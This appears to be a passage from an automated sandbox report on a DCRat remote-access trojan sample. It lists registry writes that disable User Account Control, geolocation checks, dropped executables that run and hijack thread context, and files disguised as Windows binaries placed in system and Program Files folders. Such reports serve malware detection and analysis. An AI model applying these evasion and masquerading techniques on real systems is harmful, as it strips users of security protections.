| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Program Files\Mozilla Firefox\fonts\Registry.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Program Files\Mozilla Firefox\fonts\Registry.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Program Files\Mozilla Firefox\fonts\Registry.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files\Mozilla Firefox\fonts\Registry.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Program Files\Mozilla Firefox\fonts\Registry.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Program Files\Mozilla Firefox\fonts\Registry.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Program Files\Mozilla Firefox\fonts\Registry.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files\Mozilla Firefox\fonts\Registry.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files\Mozilla Firefox\fonts\Registry.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Program Files\Mozilla Firefox\fonts\Registry.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Program Files\Mozilla Firefox\fonts\Registry.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files\Mozilla Firefox\fonts\Registry.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Program Files\Mozilla Firefox\fonts\Registry.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Program Files\Mozilla Firefox\fonts\Registry.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files\Mozilla Firefox\fonts\Registry.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Program Files\Mozilla Firefox\fonts\Registry.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Program Files\Mozilla Firefox\fonts\Registry.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files\Mozilla Firefox\fonts\Registry.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files\Mozilla Firefox\fonts\Registry.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files\Mozilla Firefox\fonts\Registry.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files\Mozilla Firefox\fonts\Registry.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Program Files\Mozilla Firefox\fonts\Registry.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Program Files\Mozilla Firefox\fonts\Registry.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files\Mozilla Firefox\fonts\Registry.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files\Mozilla Firefox\fonts\Registry.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files\Mozilla Firefox\fonts\Registry.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Program Files\Mozilla Firefox\fonts\Registry.exe | N/A |

DCRat payload

rat
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |

Checks computer location settings

| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Program Files\Mozilla Firefox\fonts\Registry.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Program Files\Mozilla Firefox\fonts\Registry.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Program Files\Mozilla Firefox\fonts\Registry.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Program Files\Mozilla Firefox\fonts\Registry.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Program Files\Mozilla Firefox\fonts\Registry.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Program Files\Mozilla Firefox\fonts\Registry.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Program Files\Mozilla Firefox\fonts\Registry.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Program Files\Mozilla Firefox\fonts\Registry.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Program Files\Mozilla Firefox\fonts\Registry.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Program Files\Mozilla Firefox\fonts\Registry.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Program Files\Mozilla Firefox\fonts\Registry.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Program Files\Mozilla Firefox\fonts\Registry.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Program Files\Mozilla Firefox\fonts\Registry.exe | N/A |

Executes dropped EXE

| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tmpB603.tmp.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tmpB603.tmp.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\fonts\Registry.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tmp4AE.tmp.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tmp4AE.tmp.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\fonts\Registry.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tmp2342.tmp.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tmp2342.tmp.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\fonts\Registry.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tmp410B.tmp.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tmp410B.tmp.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tmp410B.tmp.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\fonts\Registry.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tmp5EC5.tmp.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tmp5EC5.tmp.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\fonts\Registry.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tmp7D49.tmp.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tmp7D49.tmp.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tmp7D49.tmp.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\fonts\Registry.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tmpB10B.tmp.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tmpB10B.tmp.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\fonts\Registry.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tmpD116.tmp.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tmpD116.tmp.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tmpD116.tmp.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\fonts\Registry.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tmp313.tmp.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tmp313.tmp.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\fonts\Registry.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tmp354F.tmp.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tmp354F.tmp.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\fonts\Registry.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tmp67F7.tmp.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tmp67F7.tmp.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tmp67F7.tmp.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tmp67F7.tmp.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tmp67F7.tmp.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\fonts\Registry.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tmp9A04.tmp.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tmp9A04.tmp.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\fonts\Registry.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\fonts\Registry.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tmpD2C7.tmp.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tmpD2C7.tmp.exe | N/A |

Checks whether UAC is enabled

evasion trojan
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files\Mozilla Firefox\fonts\Registry.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Program Files\Mozilla Firefox\fonts\Registry.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Program Files\Mozilla Firefox\fonts\Registry.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Program Files\Mozilla Firefox\fonts\Registry.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Program Files\Mozilla Firefox\fonts\Registry.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files\Mozilla Firefox\fonts\Registry.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files\Mozilla Firefox\fonts\Registry.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files\Mozilla Firefox\fonts\Registry.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Program Files\Mozilla Firefox\fonts\Registry.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Program Files\Mozilla Firefox\fonts\Registry.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files\Mozilla Firefox\fonts\Registry.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Program Files\Mozilla Firefox\fonts\Registry.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Program Files\Mozilla Firefox\fonts\Registry.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Program Files\Mozilla Firefox\fonts\Registry.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files\Mozilla Firefox\fonts\Registry.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Program Files\Mozilla Firefox\fonts\Registry.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files\Mozilla Firefox\fonts\Registry.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Program Files\Mozilla Firefox\fonts\Registry.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Program Files\Mozilla Firefox\fonts\Registry.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files\Mozilla Firefox\fonts\Registry.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files\Mozilla Firefox\fonts\Registry.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files\Mozilla Firefox\fonts\Registry.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Program Files\Mozilla Firefox\fonts\Registry.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files\Mozilla Firefox\fonts\Registry.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files\Mozilla Firefox\fonts\Registry.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files\Mozilla Firefox\fonts\Registry.exe | N/A |

Suspicious use of SetThreadContext

| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| PID 2908 set thread context of 3692 | N/A | C:\Users\Admin\AppData\Local\Temp\tmpB603.tmp.exe | C:\Users\Admin\AppData\Local\Temp\tmpB603.tmp.exe |
| PID 820 set thread context of 684 | N/A | C:\Users\Admin\AppData\Local\Temp\tmp4AE.tmp.exe | C:\Users\Admin\AppData\Local\Temp\tmp4AE.tmp.exe |
| PID 4224 set thread context of 2128 | N/A | C:\Users\Admin\AppData\Local\Temp\tmp2342.tmp.exe | C:\Users\Admin\AppData\Local\Temp\tmp2342.tmp.exe |
| PID 4472 set thread context of 2056 | N/A | C:\Users\Admin\AppData\Local\Temp\tmp410B.tmp.exe | C:\Users\Admin\AppData\Local\Temp\tmp410B.tmp.exe |
| PID 3276 set thread context of 4228 | N/A | C:\Users\Admin\AppData\Local\Temp\tmp5EC5.tmp.exe | C:\Users\Admin\AppData\Local\Temp\tmp5EC5.tmp.exe |
| PID 1072 set thread context of 4704 | N/A | C:\Users\Admin\AppData\Local\Temp\tmp7D49.tmp.exe | C:\Users\Admin\AppData\Local\Temp\tmp7D49.tmp.exe |
| PID 740 set thread context of 4336 | N/A | C:\Users\Admin\AppData\Local\Temp\tmpB10B.tmp.exe | C:\Users\Admin\AppData\Local\Temp\tmpB10B.tmp.exe |
| PID 5044 set thread context of 3920 | N/A | C:\Users\Admin\AppData\Local\Temp\tmpD116.tmp.exe | C:\Users\Admin\AppData\Local\Temp\tmpD116.tmp.exe |
| PID 4292 set thread context of 4200 | N/A | C:\Users\Admin\AppData\Local\Temp\tmp313.tmp.exe | C:\Users\Admin\AppData\Local\Temp\tmp313.tmp.exe |
| PID 4276 set thread context of 4492 | N/A | C:\Users\Admin\AppData\Local\Temp\tmp354F.tmp.exe | C:\Users\Admin\AppData\Local\Temp\tmp354F.tmp.exe |
| PID 636 set thread context of 3360 | N/A | C:\Users\Admin\AppData\Local\Temp\tmp67F7.tmp.exe | C:\Users\Admin\AppData\Local\Temp\tmp67F7.tmp.exe |
| PID 4456 set thread context of 2388 | N/A | C:\Users\Admin\AppData\Local\Temp\tmp9A04.tmp.exe | C:\Users\Admin\AppData\Local\Temp\tmp9A04.tmp.exe |
| PID 452 set thread context of 2500 | N/A | C:\Users\Admin\AppData\Local\Temp\tmpD2C7.tmp.exe | C:\Users\Admin\AppData\Local\Temp\tmpD2C7.tmp.exe |

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\Windows Defender\f3b6ecef712a24 C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File created C:\Program Files\Common Files\fontdrvhost.exe C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File created C:\Program Files\Mozilla Firefox\fonts\ee2ad38f3d4382 C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File created C:\Program Files (x86)\Windows Multimedia Platform\Registry.exe C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File opened for modification C:\Program Files\Windows NT\TableTextService\en-US\RCXCCF0.tmp C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File opened for modification C:\Program Files\Windows NT\TableTextService\en-US\csrss.exe C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File created C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\SearchApp.exe C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File created C:\Program Files\Windows NT\TableTextService\en-US\886983d96e3d3e C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File created C:\Program Files\Mozilla Firefox\defaults\SearchApp.exe C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File opened for modification C:\Program Files (x86)\Windows Defender\RCXB99E.tmp C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File opened for modification C:\Program Files\Common Files\RCXC6C4.tmp C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File created C:\Program Files (x86)\Windows Multimedia Platform\ee2ad38f3d4382 C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\RCXBDD7.tmp C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File opened for modification C:\Program Files (x86)\Windows Multimedia Platform\RCXD5DD.tmp C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\defaults\SearchApp.exe C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File created C:\Program Files (x86)\Windows Defender\spoolsv.exe C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\SearchApp.exe C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\fonts\Registry.exe C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\defaults\RCXDC87.tmp C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File created C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\38384e6a620884 C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File created C:\Program Files\Windows NT\TableTextService\en-US\csrss.exe C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File created C:\Program Files\Mozilla Firefox\defaults\38384e6a620884 C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File created C:\Program Files\Common Files\5b884080fd4f94 C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File opened for modification C:\Program Files\Common Files\fontdrvhost.exe C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File created C:\Program Files\Mozilla Firefox\fonts\Registry.exe C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File opened for modification C:\Program Files (x86)\Windows Defender\spoolsv.exe C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\fonts\RCXD1B5.tmp C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File opened for modification C:\Program Files (x86)\Windows Multimedia Platform\Registry.exe C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\ShellExperiences\RCXC4B0.tmp C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File opened for modification C:\Windows\TAPI\RCXD3C9.tmp C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File opened for modification C:\Windows\TAPI\csrss.exe C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File created C:\Windows\es-ES\winlogon.exe C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File created C:\Windows\ShellExperiences\taskhostw.exe C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File created C:\Windows\TAPI\csrss.exe C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File opened for modification C:\Windows\es-ES\RCXBFFA.tmp C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File opened for modification C:\Windows\es-ES\winlogon.exe C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File created C:\Windows\es-ES\cc11b995f2a76d C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
